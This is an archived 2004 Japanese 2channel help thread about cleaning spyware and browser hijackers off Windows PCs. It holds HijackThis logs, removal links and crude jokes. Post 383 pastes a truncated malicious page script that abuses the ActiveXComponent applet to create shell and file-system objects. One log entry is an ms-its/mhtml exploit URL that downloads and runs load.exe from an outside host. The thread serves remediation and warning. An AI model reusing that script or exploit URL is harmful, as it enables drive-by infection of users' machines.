372 :ひよこ名無しさん:04/05/20 19:56 ID:1wOLQ8VZ
0721やカリビといった無修正サイトが急に開けなくなりました…。
サイトに制限が掛かったのでしょうか。
PCになんら設定の変更はないのですが…。

373 :ひよこ名無しさん:04/05/20 20:12 ID:???
スレ違いのような…

374 :ひよこ名無しさん:04/05/20 20:36 ID:???
結局のところ
おかしくなったらOS再インす子
これがいいだろ
なあ

375 :ひよこ名無しさん:04/05/20 20:38 ID:???
>>372
 >>269に感染したとおも割れ 

376 :ひよこ名無しさん:04/05/20 21:10 ID:???
>>375
hahahahaha

377 :372:04/05/20 21:27 ID:0zxlRk1u
解決しました。
McAfeeのUpdateファイルが原因だったようで、
ソフトごとアンインストールしたら
開けるようになりました。
ま○こも開きました

378 :ひよこ名無しさん:04/05/20 21:36 ID:???

なるほど。

379 :ひよこ名無しさん:04/05/20 21:58 ID:D/rmwVyv
ttp://www.geocities.co.jp/SiliconValley/3657/windows/

380 :ひよこ名無しさん:04/05/20 21:59 ID:???
↑はトロイ

381 :ひよこ名無しさん:04/05/20 22:01 ID:D/rmwVyv
http://www.geocities.co.jp/SiliconValley/3657/windows/

382 :ひよこ名無しさん:04/05/20 22:02 ID:D/rmwVyv
CSS があります
ほとんどの場合において危険ではないでしょう。

カスケーディングスタイルシートは,ブラウザ独自の特別な機能を使用できる場合があります。
信頼できないサイトでは注意するに越したことはありません。

だってさ。じゃあクリックするけど、いい?

383 :ひよこ名無しさん:04/05/20 22:04 ID:???
<!--IPT language=JavaScript
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPLET ");
function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");Shor.TargetPath = SiteURL;Shor.Save();}
function f(){
try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();
try{

384 :ひよこ名無しさん:04/05/20 22:08 ID:D/rmwVyv
悪い、英語 苦手なんだわ。日本語で頼む。

385 :sage:04/05/20 22:08 ID:???
テスト

386 :初心者板から264です。:04/05/20 22:20 ID:mbnnc7yo
初心者板物凄い勢いで質問に答えるスレ264です。
こちらに誘導していただきました。
当方女です。
携帯で無料着メロサイトたどってたらいつのまにかエロサイト踏んでしまいました。入会とか退会の項目がなかったんですがこれは請求されるのですか?
何個も間違えてエロサイト踏んでしまってるんですが平気なんですかね?教えて君でスマソ

387 :961:04/05/20 22:43 ID:???
>>267
それインスコしてみた。
スキャンに時間かかるけど良さげだな
何やってもダメな人は最期の頼みでどうだ?
つかトロイ発見後の動きも知りたいから試してくれ。

>>341
>>368を見れ

>>338
重傷過ぎ・・・最低限テンプレ実行してからまだあったら以下をFix
アンインスコ情報にありそうなものCnsMinとかWhenUSaveとかはそっちもチェックしれ
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {F7F808F0-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem216.dll
O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [msbb] c:\program files\180solutions\msbb.exe
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WhenUSave] "C:\Program Files\Save\Save.exe"
O4 - HKLM\..\Run: [WhenUSearch] "C:\Program Files\WhenUSearch\Search.exe"
O4 - HKCU\..\Run: [Tars] C:\Documents and Settings\Owner\Application Data\utwb.exe
O4 - HKCU\..\Run: [WNSC] C:\WINDOWS\System32\wnsintsv.exe
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://cashsearch.biz/legal/x.chm::/load.exe
O16 - DPF: {E2F2B9D0-96B9-4B25-B90C-636ECB207D18} - http://www.whenusearch.com/WUInstSEWC.cab
O16 - DPF: {EF86873F-04C2-4A95-A373-5703C08EFC7B} (Installer Class) - http://www.xxxtoolbar.com/ist/softwares/v3.0/0006.cab


388 :961:04/05/20 23:04 ID:Ji61HBPz
>>338
CnsMinはこっちだったスマソ
http://higaitaisaku.web.infoseek.co.jp/removecnsmin.html

追加O11は上で無くなるはずだ。
O3 - Toolbar: ISTbar - {5F1ABCDB-A875-46c1-8345-B72A4567E486} - C:\Program Files\ISTbar\istbar.dll
O4 - HKLM\..\Run: [Internet Optimizer] "C:\Program Files\Internet Optimizer\optimize.exe"
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O11 - Options group: [!CNS] JWord(

389 :前スレの989:04/05/20 23:07 ID:zsPpoHlH
>>337

ありがとうございます。
他所でもご協力頂いていたのですが、なかなか有効な手段がみつからず、半ば諦めていました。
早速試させてもらいます。


390 :ひよこ名無しさん:04/05/20 23:35 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、今夜も賑わってるね♪
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < ゆっくりしてって下さいモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

391 :ひよこ名無しさん:04/05/21 00:05 ID:???
パソコン初心者だけど
どうせわからないから↓みたいに適当にしたら直った感じ。

<症状>
ホームページのアドレス欄が書き直してもC:\WINDOWS\secure.htmlになってて
2ちゃんとか普通に見てるとC:\WINDOWS\secure.htmlが出てきて
10分くらいたったらまた出てきて(これが何回か続く)
またちょっと間たつとスクリプトエラー「はい」、「いいえ」
とかいう画面が出てきたりして(他にも右クリックでは閉じれない画面とか出てきたり)
意味不明だったが
<適当処置>
http://higaitaisaku.web.infoseek.co.jp/removereg32.html#top(の対処方法ってやつ)など見て
HiJack Thisで
>O4 - HKLM\..\Run: [Reg32] C:\WINDOWS\reg32.exe (最近reg33.exeという奴も出てきました)
>O4 - HKLM\..\Run: [Dial32] C:\WINDOWS\dl.exe
>O4 - HKLM\..\Run: [Dial33] C:\WINDOWS\dlm.exe
とあと2つ(だったか)削除して再起動して
C:\WINDOWSからreg33.exeとか怪しいの10個くらい?削除したら直った。
しかし起動した直後だけC:\WINDOWSが出てくるが、まぁこれくらいいいや。

392 :ひよこ名無しさん:04/05/21 00:11 ID:???
Windowsの起動の時に勝手にC:\(フォルダ)が開いてしまいます。
過去ログを読み、msconfig、regedit、Adaware、Spybot S&D等
実行してみたのですが原因が分かりません。
(タイミングからいってサービスが何か悪さをしてると思うのですが…)
OSはWindows98(無印)、IEは6.0.2800.1106SP1です。
以下hijackthisのログです。
見識の深い皆さん、よろしくお願いします。

393 :ひよこ名無しさん:04/05/21 00:12 ID:???

Logfile of HijackThis v1.97.7
Scan saved at 23:37:27, on 04/05/20
Platform: Windows 98 Gold (Win9x 4.10.1998)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\PROGRAM FILES\TRAYMAN\TRAYMAN.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCEVTMGR.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCSETMGR.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCPROXY.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\SNDSRVC.EXE
C:\WINDOWS\EXPLORER.EXE
C:\JUST\ATOK12\ATOK12MN.EXE
C:\PROGRAM FILES\ELECOM\WHEELUTILITY\ECIUHOOK.EXE
C:\PROGRAM FILES\NEC\ATERMWL\WDSM.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCAPP.EXE
C:\MY DOCUMENTS\ONLINE\TCLOCK-030531-ANALOG\TCLOCK.EXE
C:\MY DOCUMENTS\ONLINE\PTLNC37A\PTLNC.EXE
C:\WINDOWS\デスクトップ\HIJACKTHIS.EXE


394 :ひよこ名無しさん:04/05/21 00:14 ID:???
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: Web assistant - {9ECB9560-04F9-4bbc-943D-298DDF1699E1} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\WINDOWS\DOWNLOADED PROGRAM FILES\GOOGLETOOLBAR_JA_1.1.62-DELEON.DLL
O3 - Toolbar: ????? - {C1724158-90ED-413D-AE2D-6360F0CAA755} - C:\PROGRA~1\NTT-X\GOOSTICK\GOOSTK.DLL

395 :ひよこ名無しさん:04/05/21 00:15 ID:???
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O3 - Toolbar: ????? - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\PROGRAM FILES\MSN TOOLBAR\01.01.1629.0\JA\MSNTB.DLL
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\PROGRAM FILES\CANON\EASY-WEBPRINT\TOOLBAND.DLL
O3 - Toolbar: Web assistant - {0B53EAC3-8D69-4b9e-9B19-A37C9A5676A7} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Elecom wheel extention] C:\Program Files\Elecom\WheelUtility\eciuhook.exe
O4 - HKLM\..\Run: [WDSM.EXE] C:\PROGRAM FILES\NEC\ATERMWL\WDSM.EXE
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [URLLSTCK.exe] C:\Program Files\Norton Internet Security\UrlLstCk.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [TrayManager] C:\PROGRA~1\TRAYMAN\TRAYMAN.EXE
O4 - HKLM\..\RunServices: [ccEvtMgr] "C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe"

396 :ひよこ名無しさん:04/05/21 00:15 ID:???
O4 - HKLM\..\RunServices: [ccSetMgr] "C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe"
O4 - HKLM\..\RunServices: [ScriptBlocking] "C:\Program Files\Common Files\Symantec Shared\Script Blocking\SBServ.exe" -reg
O4 - HKLM\..\RunServices: [ccProxy] C:\PROGRA~1\COMMON~1\SYMANT~1\CCPROXY.EXE
O4 - HKLM\..\RunServices: [SndSrvc] C:\PROGRA~1\COMMON~1\SYMANT~1\SNDSRVC.EXE
O4 - Startup: TClock.lnk = C:\My Documents\ONLINE\tclock-030531-analog\tclock.exe
O4 - Startup: ぷちらんちゃ.lnk = C:\My Documents\ONLINE\ptlnc37a\ptlnc.exe
O8 - Extra context menu item: &Google Search - res://C:\WINDOWS\DOWNLOADED PROGRAM FILES\GOOGLETOOLBAR_JA_1.1.62-DELEON.DLL/cmsearch.html
O8 - Extra context menu item: Cac&hed Snapshot of Page - res://C:\WINDOWS\DOWNLOADED PROGRAM FILES\GOOGLETOOLBAR_JA_1.1.62-DELEON.DLL/cmcache.html
O8 - Extra context menu item: Si&milar Pages - res://C:\WINDOWS\DOWNLOADED PROGRAM FILES\GOOGLETOOLBAR_JA_1.1.62-DELEON.DLL/cmsimilar.html
O8 - Extra context menu item: Backward &Links - res://C:\WINDOWS\DOWNLOADED PROGRAM FILES\GOOGLETOOLBAR_JA_1.1.62-DELEON.DLL/cmbacklinks.html
O8 - Extra context menu item: &gooでニュース検索 - C:\WINDOWS\Profiles\fmvbiblone7\Application Data\NTT-X\goostick\script0.html
O8 - Extra context menu item: &goo国語/新語辞典で検索 - C:\WINDOWS\Profiles\fmvbiblone7\Application Data\NTT-X\goostick\script1.html
O8 - Extra context menu item: &goo英和辞典で検索 - C:\WINDOWS\Profiles\fmvbiblone7\Application Data\NTT-X\goostick\script2.html
O8 - Extra context menu item: &goo和英辞典で検索 - C:\WINDOWS\Profiles\fmvbiblone7\Application Data\NTT-X\goostick\script3.html
O8 - Extra context menu item: &gooでブロードバンド検索 -

397 :ひよこ名無しさん:04/05/21 00:16 ID:???
C:\WINDOWS\Profiles\fmvbiblone7\Application Data\NTT-X\goostick\script4.html
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {6CB5E471-C305-11D3-99A8-000086395495} (Google Activate) - http://toolbar.google.com/data/ja/deleon/1.1.49-deleon/GoogleNav.cab
O16 - DPF: {A2554B5B-5125-4A64-88C7-5CFC0EB32914} (Infoseek Toolbar) - http://toolbar2.infoseek.co.jp/build702/INFOSEEK.CAB
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/ansi/iuctl.CAB?38060.0415972222
O16 - DPF: {74FFE28D-2378-11D5-990C-006094235084} (IBM Access Support) - https://www.ibm.com/pc/support/access/sdccommon/download/IbmEgath.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004033001/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {22D16976-00DE-4CD2-807F-E8C63E9EBEEE} (QDiagCAUpdateObj Class) - http://cweb.canon.jp/drv-upd/install/html/qdiagca.cab

398 :ひよこ名無しさん:04/05/21 00:18 ID:dl/iD6Xi
 質問です!
エロサイトが開くスパイウエアにやられてシステムの復元しようとしても、
復元に失敗したって出て復元できません。
どの復元ポイント選んでも駄目でした。
テンプレでセーブモードにすればいいみたいな事書いてあったので、
やってみたのですがまた失敗したとでました。
CWShredderはダウンロードしてウィルスを撃退したみたいですが、
いまだにネット接続したらエロサイトが勝手に開いちゃいます。
どうすればシステムの復元がうまくいくのでしょうか?

399 :ひよこ名無しさん:04/05/21 00:28 ID:qPBVTdbQ
画面の右下の時計の上にSearchbarって言うのがあって気になってしかたありません。
解決方法はないでしょうか?

ちなみにノートでシャープ、メビウスです。

有害無害もわかりませんが消し方を教えてください。


400 :398:04/05/21 00:37 ID:dl/iD6Xi
ちなみにOSがMEです

401 :ひよこ名無しさん:04/05/21 00:38 ID:???
>>399
OSは?

402 :272:04/05/21 00:40 ID:X1IM8p71
もう1度a)→b)→c)を試しましたがやはり駄目でした。

最後の手段を教えてください。

403 :ひよこ名無しさん:04/05/21 00:44 ID:???
>>400
じゃあ修復コンソール。

404 :ひよこ名無しさん:04/05/21 00:54 ID:???
>>399
こんなのですか?
ttp://higaitaisaku.web.infoseek.co.jp/spywareex01.png


405 :338:04/05/21 01:02 ID:GzhVKTni
>>388,>>387さん、ありがとうございました。
下にあるバーはなくなりました。
あと、かなり立ち上げ等が軽くなりました。本当に感謝です。
しかし、インターネットを開くといまだにインストーラが出現します・・・。
それと、
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
の二つがいくらfixしても消えません・・・。
なぜなのでしょうか・・・??


406 :ひよこ名無しさん:04/05/21 01:29 ID:???
>>272

Internet Explorer関連レジストリの完全なリセット

http://higaitaisaku.web.infoseek.co.jp/cleanfixreg.html

407 :前スレの989:04/05/21 01:38 ID:glmyMEok
>>337

記載して頂いた手順を試したところ、『IEのホームが書き換えられる』という障害が治りました!!
加えて『フォルダを開くとフリーズする』という障害があったのですが、そちらの方も今のところ起こっていません。


Spypodでスキャンすると、相変わらず

DSO Exploit: Data source object exploit (レジストリ変更, nothing done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

CnsMin: Library (ファイル, nothing done)
C:\WINDOWS\Downloaded Program Files\CnsMinSV.dll

CnsMin: Library (ファイル, nothing done)
C:\WINDOWS\Downloaded Program Files\CnsMinEx.dll

を検出してしまいますが・・・。


いずれにしても、ありがとうございます。本当に感謝しています。

最後にお聞きしたいのですが、リネームしたSYSTEM32_.DLLはそのままでいいのでしょうか?
PCに詳しくないもので、DLLをリネームするというと怖いイメージがあるのです。

408 :ひよこ名無しさん:04/05/21 01:47 ID:???
>>338
その2つはそのままでもいいと思うよ。

コントロールパネル→プログラムの追加と削除のInternet Optimizerは

削除したのかい?

409 :ひよこ名無しさん:04/05/21 01:52 ID:isKj8aZ0
はじめまして。
先ほどエロサイトに飛んだところ何かをダウンロードされてしまいました。
特別気になる症状は無いのですがツールバー、アドレス欄の下に
ISEARCHとかいう棒が一本できてしまいました。
非常に鬱陶しいので消したいのですがそのファイルが何処にあるのか分かりません。
どなたか教えてください。
宜しくお願いします。

410 :ひよこ名無しさん:04/05/21 01:54 ID:???
>>409
うっせえハゲ。

411 :ひよこ名無しさん:04/05/21 01:55 ID:???
>>405
問題なし。

412 :ひよこ名無しさん:04/05/21 02:01 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

413 :409:04/05/21 02:15 ID:isKj8aZ0
>>412さん
ありがとうございました。
何とか元に戻すことが出来ました。
1〜8、肝に銘じておきます。

414 :272:04/05/21 02:20 ID:X1IM8p71
>>406
相変わらずabout:blankのままです。
もう、他に方法はないでしょうか?

415 :ひよこ名無しさん:04/05/21 02:29 ID:???
>>414
必殺リカバリーディスク発動

416 :272:04/05/21 02:44 ID:X1IM8p71
>>415
やっぱりそれですか。
リカバリーの仕方をわかりやすく解説してあるサイトを紹介してくれませんか?

417 :ひよこ名無しさん:04/05/21 02:48 ID:???
スタート
すべてのプログラム
アクセサリ
システムツール
システムの復元
コンピューターを以前の状態に復元するをチェックし次へ
太字になっている感染前の日付をクリックし次へ
でシャットダウンして復元してくれる。



418 :ひよこ名無しさん:04/05/21 02:49 ID:???
>>416
PC買った時、付属品としてリカバリーディスクがあったかどうか
それが今もあるかどうか確認
やり方はPC取り扱い説明書が一番親切
ドライブが消えてしまうので外付けハードか
CD-(DVD)Rに退避させておくこと
リカバリーディスクがなければ無理

419 :ひよこ名無しさん:04/05/21 02:50 ID:???

なるほど。

420 :272:04/05/21 03:10 ID:X1IM8p71
>>418
ありました。やってみます。もう、帰って来れないかもしれませんが・・・・

では

421 :ひよこ名無しさん:04/05/21 03:11 ID:???
>>272
ホームが白でも不具合は無いんでしょ?
ヤフーのURLショートカットを作っておくのは都合が悪いのかい?

422 :418:04/05/21 03:15 ID:???
>>420
がんばってくれ
HPのお気に入りも回避しとかないとあとで探すのメンドイよ

423 :ひよこ名無しさん:04/05/21 03:19 ID:???

about:blankは強敵だな。

424 :272:04/05/21 04:46 ID:X1IM8p71
ただいま〜!!初めてこんな恐ろしいことしました!でも無事に成功したようです。
でも、中身が空っぽ・・・・  とりあえずLive2chをインストールして書き込んでます。
今まで助けてくれた方々どうもありがとうございました。m( __ __ )m



425 :ひよこ名無しさん:04/05/21 06:04 ID:???
助けてください!
エロサイトを見ていたら、どーやらウィルスに
感染してしまったようです?
何もしていないのに,勝手に膨張してしまい困っています。
良いワクチン、ソフトが有りましたら、教えてください!
お願いします。OSはノーマルなズルムケ&只今18cmぐらいです!

426 :ひよこ名無しさん:04/05/21 08:31 ID:???
>>425
ココ行って脳をフォーマットしてもらえ。
ttp://www.aleph.to/

427 :ひよこ名無しさん:04/05/21 08:55 ID:DTcc9LQ6
質問に来た藻前らへ。

>>1 >>2 >>3 >>6 >>8 >>10 読んで、
それでも判らなかった時点で質問するように。

428 :ひよこ名無しさん:04/05/21 09:17 ID:???
なるほど。

429 :341:04/05/21 10:35 ID:n9i+Fg+I
http://higaitaisaku.web.infoseek.co.jp/hosts.html
ここに従って、hostsを置き換えたのに、
まだセキュリティサイトに接続しようとするとブラウザが閉じてしまいます。
どうすればいいんでしょうか?

430 :ひよこ名無しさん:04/05/21 10:38 ID:???
>>429
HackerDefenderを悪用したスパイウェア − スパイウェア除去アプリケーションが使えない
http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

431 :341:04/05/21 11:06 ID:n9i+Fg+I
>>430
そうなんです。それを治そうとしてシステムの復元をしようとしたら、
システムを復元してもhostsファイルは元のままなので置き換えるようにとの事なので、
hostsファイルを置き換えたんですが。

432 :ひよこ名無しさん:04/05/21 11:08 ID:???
フォーマット! フォーマット! フォーマット! フォーマット!
フォーマット! フォーマット! フォーマット! フォーマット!
フォーマット! フォーマット! フォーマット! フォーマット!
フォーマット! フォーマット! フォーマット! フォーマット!

433 :337:04/05/21 11:43 ID:Hu4cCpl6
>>407
わたしの管理している環境ではSYSTEM32.DLLなるファイルは被害PCにだけ存在していた
ので良からぬファイルと判断し、SYSTEM32_.DLLに変更しても不具合がないことを確認して
から削除しました。(セーフモードにしなくても削除可能でした)
参考になれば。

434 :425です。:04/05/21 12:35 ID:???
>>426
入信する前に、ますは自力で……と思い、
初心者ですが過去レスを読み直し、色々
いじってみたら何んと、ウィルスが抜け
正常に機能し始めました!
本当に恐ろしく,良い経験をしました。
もーエロサイトは週に、2回でけに減らします?
ちなみに現在のOSはノーマルなズルムケ&只今7.5位です。
良いアドバイス有難う御座いました!
何か有りましたら、また………

435 :ひよこ名無しさん:04/05/21 13:34 ID:VMDBRaCr
>>434
初心者なのに手動でウィルス駆除できたのかね?
それはすごいですね。

436 :ひよこ名無しさん:04/05/21 13:39 ID:tS+5cABX
Q2チェックサービス終わってますが、ほかにチェックするとこありますか?

437 :ひよこ名無しさん:04/05/21 14:01 ID:???
>>345

>>426で 快勝あーれふ な某教団を薦められてる。
さぞ必死だった事は想像に難くない。w

438 :ひよこ名無しさん:04/05/21 14:10 ID:???
エロサイトに行って、「ダウンロードしてインストールしますか?」の画面が出てきたら、
はい、をクリックしては絶対にダメ!
はい、をクリックするとどうなるかと言うと、
C:\WINDOWS\Downloaded Program Files
ここにActiveXコントロールをダウンロードされて、
Temporary Internet Filesにダウンロードしたファイルを使って、
IEを始め、OSを改変されてしまう。
手口はこんなもん。
サービス、スタートアップ、タスクスケジューラー
これらに、IEのホームアドレスページ、ツールバー、サーチエンジン
これらの設定レジストリを毎回起動時に書き替えて、ツールでレジストリの修正をしても
結果的に無効にしている。

439 :ひよこ名無しさん:04/05/21 14:18 ID:DTcc9LQ6
質問に来た藻前らへ。

>>1 >>2 >>3 >>6 >>8 >>10 読んで、
それでも判らなかった時点で質問するように。

440 :ひよこ名無しさん:04/05/21 14:25 ID:???
エロサイトに行って、「ダウンロードしてインストールしますか?」の画面が出てきたら、
はい、をクリックしては絶対にダメ!
はい、をクリックするとどうなるかと言うと、
C:\WINDOWS\Downloaded Program Files
ここにActiveXコントロールをダウンロードされて、
Temporary Internet Filesにダウンロードしたファイルを使って、
IEを始め、OSを改変されてしまう。
手口はこんなもん。
サービス、スタートアップ、タスクスケジューラー
これらに、IEのホームアドレスページ、ツールバー、サーチエンジンを
毎回、起動時に書き替えるプログラムを登録するので、
ツールでレジストリの修正をしても結果的に無効にしている。

441 :ひよこ名無しさん:04/05/21 14:33 ID:???
エロサイトに行って、「ダウンロードしてインストールしますか?」の画面が出てこず
勝手にインストールされてしまう人が、このスレに来るわけですよね

442 :ひよこ名無しさん:04/05/21 14:37 ID:???
>>441
違う!最近のはサイトに行っただけで感染する


443 :ひよこ名無しさん:04/05/21 14:44 ID:???
>>440
二度貼りするほど大事な事か?
ここに来る人々にとっては、後悔先に立たず
ってな内容のような気がするが。

>>439 を上へ押し上げずに
最新レスに置いといた方が良かったんじゃない?

444 :前スレの989:04/05/21 14:59 ID:glmyMEok
>>433
分かりました。
自己の責任において、削除します。
今回は本当に助かりました。ありがとうございます。

445 :ひよこ名無しさん:04/05/21 15:03 ID:???
>>442
http://homepage3.nifty.com/tef-room/virus/securepedo-1.html

446 :ひよこ名無しさん:04/05/21 15:14 ID:uxT1/5Ye
DivX(R) Codec 5.1を、入れてますが
最近、「この動画はサポートされてません」と表示され
画像が出なくて音声だけになります
どうすれば画像も出ますか?

447 :ひよこ名無しさん:04/05/21 15:14 ID:???
>>442
スクリプトがActiveXを呼び出すの知ってる?
http://akademeia.info/main/lecture1/tokubetu_activex.htm

448 :ひよこ名無しさん:04/05/21 15:24 ID:???
>>442
勝手な事言ってないで、みんなもっと勉強しようよ。
ここに書いてあるのも完全じゃないかもしれないけれど、
スクリプトが勝手に実行されてしまうのは、セキュリティホールが存在しているからだ。
http://www.itmedia.co.jp/help/howto/security/special/

449 :ひよこ名無しさん:04/05/21 15:40 ID:???
>>442

ttp://hotwired.goo.ne.jp/news/news/technology/story/20030131301.html

450 :悩める人 ◆sZMOg20d0E :04/05/21 15:45 ID:SNcGXb8m
ご質問です。
WIN-XPですが、最近頻繁に「仮想メモリーの最小値が少ないです・・・」の
メッセージが出るのです。ディスククリーンをしたり、メモリを増設(256M→512M)
したのですが、相変わらず出ます。
どのような処置をしたらよいのでしょうか?

451 :ひよこ名無しさん:04/05/21 15:45 ID:0QF7oEw9
>>446
ttp://siem.muw.jp/2ch/codex.htm

全部インスコしとけ。


452 :ひよこ名無しさん:04/05/21 15:47 ID:???
>>450
エロサイトと何の関係が?

453 :ひよこ名無しさん:04/05/21 16:08 ID:???
>>449
ちょっと古過ぎねえか?
2003年1月30日 2:00am PT

454 :ひよこ名無しさん:04/05/21 16:11 ID:FEFEU/ot
質問させていただきます
画像アップローダーで拡張子が.xxxとなっているのを見かけますが見かけますが、
これって危ないファイルなのでしょうか?
他にもこんなファイルは危ないというもの、ファイル形式、サイズ等がありましたら教えてください。


455 :ひよこ名無しさん:04/05/21 16:14 ID:???
>>454
影武者偽装ファイル

456 :425です。:04/05/21 16:14 ID:???
またまた、すみません。
